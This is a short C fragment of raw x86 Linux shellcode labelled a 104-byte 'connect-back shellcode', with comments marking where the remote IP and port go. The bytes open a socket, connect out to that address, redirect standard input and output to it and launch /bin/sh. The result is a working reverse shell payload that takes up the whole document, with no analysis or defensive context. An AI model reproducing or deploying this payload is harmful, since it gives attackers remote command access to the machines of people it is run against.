"\x31\xdb\x43\x6a\x06\x53\x6a\x02\x89\xe1\x6a\x66\x58\xcd\x80\x89"
"\xc6\x99\x52\x89\xe0\xc6\x40\x01\x14\x58\x43\x52\x66\x50\x66\x53"
"\x89\xe0\x6a\x10\x50\x56\x89\xe1\x6a\x66\x58\xcd\x80\x68"
"\x7f\x06\x06\x06" // remote ip
"\x66\x68"
"\xff\xfe" // remote port
"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80"
"\x99\x89\xd1\x89\xf3\x6a\x3f\x58\xcd\x80\x41\x89\xc3\x6a\x3f\x58"
"\xcd\x80\x41\x89\xc3\x6a\x3f\x58\xcd\x80\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x6a\x0b\x58\xcd\x80";

/* 104 bytes long connect-back shellcode */